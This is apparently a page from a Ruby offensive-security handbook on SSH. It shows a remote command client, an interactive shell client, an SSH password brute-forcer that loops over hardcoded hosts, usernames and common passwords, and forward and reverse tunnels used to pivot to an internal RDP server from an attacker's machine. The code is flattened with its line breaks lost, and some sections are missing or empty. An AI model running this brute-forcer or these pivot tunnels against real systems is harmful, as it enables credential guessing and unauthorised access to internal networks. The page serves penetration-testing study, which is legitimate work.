我的书签
添加书签
移除书签SSH
- Install net-ssh gem
This is a very basic SSH client which sends and executes commands on a remote system
# KING SABRI | @KINGSABRIrequire 'net/ssh'@hostname = "localhost"@username = "root"@password = "password"@cmd = ARGV[0]beginssh = Net::SSH.start(@hostname, @username, :password => @password)res = ssh.exec!(@cmd)ssh.closeputs resrescueputs "Unable to connect to #{@hostname} using #{@username}/#{@password}"end
Here a simple SSH client which give you an interactive PTY
#!/usr/bin/env ruby# KING SABRI | @KINGSABRIrequire 'net/ssh'@hostname = "localhost"@username = "root"@password = "password"Net::SSH.start(@hostname, @username, :password => @password, :auth_methods => ["password"]) do |session|# Open SSH channelsession.open_channel do |channel|# Requests that a pseudo-tty (or "pty") for interactive application-like (e.g vim, sudo, etc)channel.request_pty do |ch, success|raise "Error requesting pty" unless success# Request channel type shellch.send_channel_request("shell") do |ch, success|raise "Error opening shell" unless successSTDOUT.puts "[+] Getting Remote Shell\n\n" if successend# Print STDERR of the remote host to my STDOUTSTDOUT.puts "Error: #{data}\n"end# When data packets are received by the channelchannel.on_data do |ch, data|STDOUT.print datacmd = getschannel.send_data( "#{cmd}" )trap("INT") {STDOUT.puts "Use 'exit' or 'logout' command to exit the session"}endchannel.on_eof do |ch|puts "Exiting SSH Session.."endsession.loopendend
ssh-bf.rb
#!/usr/bin/env ruby# KING SABRI | @KINGSABRI#require 'net/ssh'def attack_ssh(host, user, password, port=22, timeout = 5)beginNet::SSH.start(host, user, :password => password,:auth_methods => ["password"], :port => port,:paranoid => false, :non_interactive => true, :timeout => timeout ) do |session|puts "Password Found: " + "#{host} | #{user}:#{password}"endrescue Net::SSH::ConnectionTimeoutputs "[!] The host '#{host}' not alive!"rescue Net::SSH::Timeoutputs "[!] The host '#{host}' disconnected/timeouted unexpectedly!"rescue Errno::ECONNREFUSEDputs "[!] Incorrect port #{port} for #{host}"rescue Net::SSH::AuthenticationFailedputs "Wrong Password: #{host} | #{user}:#{password}"rescue Net::SSH::Authentication::DisallowedMethodputs "[!] The host '#{host}' doesn't accept password authentication method."hosts = ['192.168.0.1', '192.168.0.4', '192.168.0.50']users = ['root', 'admin', 'rubyfu']passs = ['admin1234', 'P@ssw0rd', '123456', 'AdminAdmin', 'secret', coffee]hosts.each do |host|users.each do |user|passs.each do |password|attack_ssh host, user, passwordend end end
ssh-ftunnel.rb
#!/usr/bin/env ruby# KING SABRI | @KINGSABRIrequire 'net/ssh'Net::SSH.start("127.0.0.1", 'root', :password => '123132') do |ssh|ssh.forward.local('0.0.0.0', 3333, "WebServer", 3389)puts "[+] Starting SSH forward tunnel"ssh.loop { true }end
Now connect to the SSH Server on port 3333 via your RDP client, you’ll be prompt for the WebServer‘s RDP log-in screen
rdesktop WebServer:3333
Reverse SSH Tunnel
|--------DMZ------|---Local Farm----|| | ||Attacker| <---SSH Tunnel---- | |SSH Server| <-RDP-> |Web server| || | | | |`->-' |-----------------|-----------------|
Run ssh-rtunnel.rb on the SSH Server
Now SSH from the SSH Server to localhost on the localhost’s SSH port then connect from your localhost to your localhost on port 3333 via your RDP client, you’ll be prompt for the WebServer‘s RDP log-in screen
rdesktop localhost:3333
To install scp gem
gem install net-scp
Upload file
require 'net/scp'Net::SCP.upload!("SSHServer","root","/rubyfu/file.txt", "/root/",#:recursive => true, # Uncomment for recursive:ssh => { :password => "123123" }
- Download file
